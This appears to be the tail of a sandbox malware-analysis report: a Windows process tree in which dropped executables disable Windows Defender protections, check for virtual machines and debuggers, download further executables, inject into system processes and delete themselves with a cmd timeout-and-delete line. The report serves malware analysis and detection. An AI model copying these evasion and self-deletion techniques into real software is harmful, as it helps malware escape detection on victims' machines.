                                                                                                                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2036 -prefsLen 27100 -prefMapHandle 2040 -prefMapSize 270279 -ipcHandle 2116 -initialChannelId {6caed2d6-8091-4895-ac5f-dc496e7d9301} -parentPid 1668 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1668" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
                                                                                                                                                                                                8⤵
                                                                                                                                                                                                  PID:3612
                                                                                                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2536 -prefsLen 27136 -prefMapHandle 2540 -prefMapSize 270279 -ipcHandle 2548 -initialChannelId {0331da29-298b-4474-905a-5c781f0a4916} -parentPid 1668 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1668" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                    PID:2460
                                                                                                                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3900 -prefsLen 25164 -prefMapHandle 3904 -prefMapSize 270279 -jsInitHandle 3908 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3916 -initialChannelId {00b44156-f2f1-477d-8471-64e5dbc4cfd6} -parentPid 1668 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1668" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                                                    PID:2540
                                                                                                                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4064 -prefsLen 27277 -prefMapHandle 4068 -prefMapSize 270279 -ipcHandle 4140 -initialChannelId {115d3b4a-ba48-44c2-a85d-d9e27f0a1292} -parentPid 1668 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1668" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                      PID:2484
                                                                                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4560 -prefsLen 34776 -prefMapHandle 4564 -prefMapSize 270279 -jsInitHandle 4568 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4532 -initialChannelId {fa2a527e-fecc-47cb-9cf3-1f500393da6d} -parentPid 1668 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1668" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                      PID:4268
                                                                                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5180 -prefsLen 35013 -prefMapHandle 5184 -prefMapSize 270279 -ipcHandle 5188 -initialChannelId {7e362718-f9b0-4d38-9455-3cf9041480ba} -parentPid 1668 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1668" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                      PID:8100
                                                                                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5412 -prefsLen 32900 -prefMapHandle 5416 -prefMapSize 270279 -jsInitHandle 5420 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5432 -initialChannelId {c980effb-c9f6-42b5-a7df-313ec769b0ab} -parentPid 1668 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1668" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                      PID:8132
                                                                                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4800 -prefsLen 32952 -prefMapHandle 4804 -prefMapSize 270279 -jsInitHandle 5632 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5660 -initialChannelId {598a420d-fb26-4ea9-99d6-e6929453b73c} -parentPid 1668 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1668" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                      PID:8164
                                                                                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5684 -prefsLen 32952 -prefMapHandle 5672 -prefMapSize 270279 -jsInitHandle 5772 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5848 -initialChannelId {15b2913b-be1f-47c5-9a09-f1b7c28c4791} -parentPid 1668 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1668" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                      PID:6108
                                                                                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5432 -prefsLen 32952 -prefMapHandle 6276 -prefMapSize 270279 -jsInitHandle 1664 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6224 -initialChannelId {048e99b2-b0e8-402d-876e-1b3db20dc50a} -parentPid 1668 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1668" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 10 tab
                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                      PID:11200
                                                                                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2832 -prefsLen 33192 -prefMapHandle 904 -prefMapSize 270279 -jsInitHandle 6160 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6396 -initialChannelId {f57e8f62-e8b6-4ba3-9956-c91c4aad4f15} -parentPid 1668 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1668" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 11 tab
                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                      PID:7732
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10236250101\00cbf8bb83.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10236250101\00cbf8bb83.exe"
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                • Modifies Windows Defender DisableAntiSpyware settings
                                                                                                                                                                                                • Modifies Windows Defender Real-time Protection settings
                                                                                                                                                                                                • Modifies Windows Defender TamperProtection settings
                                                                                                                                                                                                • Modifies Windows Defender notification settings
                                                                                                                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • Identifies Wine through registry keys
                                                                                                                                                                                                • Windows security modification
                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                PID:3952
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10236260101\6826bc161f.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10236260101\6826bc161f.exe"
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • Identifies Wine through registry keys
                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                PID:6220
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10236270101\63a93aa509.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10236270101\63a93aa509.exe"
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • Identifies Wine through registry keys
                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                PID:6592
                                                                                                                                                                                                • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                  "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                  • Downloads MZ/PE file
                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                  PID:7824
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10236280101\m0wsoI3.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10236280101\m0wsoI3.exe"
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                                PID:7104
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\10236280101\m0wsoI3.exe" & exit
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                    PID:13092
                                                                                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                      timeout /t 5
                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                                      PID:2004
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\10236290101\UD49QH6.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10236290101\UD49QH6.exe"
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Identifies Wine through registry keys
                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                  PID:6200
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\10236310101\zY9sqWs.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10236310101\zY9sqWs.exe"
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                  PID:11536
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe"
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                    PID:6868
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\10236300101\HmngBpR.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10236300101\HmngBpR.exe"
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                  PID:7888
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\archivebrowser_GD\SplashWin.exe
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\archivebrowser_GD\SplashWin.exe
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                    PID:4300
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\archivebrowser_GD\SplashWin.exe
                                                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\archivebrowser_GD\SplashWin.exe
                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                      PID:11280
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                        PID:11308
                                                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                          • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                                                                                          • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                          PID:7308
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\10236320101\ea5451a841.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10236320101\ea5451a841.exe"
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                  PID:11600
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10236320101\ea5451a841.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10236320101\ea5451a841.exe"
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                    PID:11624
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\10236330101\200902465d.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10236330101\200902465d.exe"
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                  PID:11888
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\10236340101\320cad8327.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10236340101\320cad8327.exe"
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Identifies Wine through registry keys
                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                  PID:2900
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\10236350101\37aae704df.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10236350101\37aae704df.exe"
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                  • Identifies Wine through registry keys
                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                  PID:21560
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe
                                                                                                                                                                                              3⤵
                                                                                                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • Identifies Wine through registry keys
                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                              PID:5544
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe
                                                                                                                                                                                            2⤵
                                                                                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Identifies Wine through registry keys
                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                            PID:556
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          PID:1908
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          PID:6000
                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4028 -ip 4028
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:1384
                                                                                                                                                                                          • C:\Windows\system32\taskmgr.exe
                                                                                                                                                                                            "C:\Windows\system32\taskmgr.exe" /7
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                            • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                                            PID:5012
                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:4648
                                                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:2348
                                                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:3544
                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:7460
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    PID:8056
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    PID:7992
                                                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:8032
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      PID:12776
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      PID:10972
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe"
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      PID:7068
                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:13156
                                                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:11452
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 8772 -ip 8772
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:19556
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 10936 -ip 10936
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:19564
                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 7564 -ip 7564
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:25556
                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:29232
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 7524 -ip 7524
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:8732
                                                                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:13512
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 31380 -ip 31380
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:11940
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 30032 -ip 30032
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:11532
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 28412 -ip 28412
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:32096
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:32456
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:32464
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe"
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:32472
                                                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:26384
                                                                                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                                                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:7664
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 32444 -ip 32444
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:25112
                                                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:28208
                                                                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:16364
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 24672 -ip 24672
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                              PID:14872
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:18872
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:18912
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe"
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:18916
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 32408 -ip 32408
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:11120
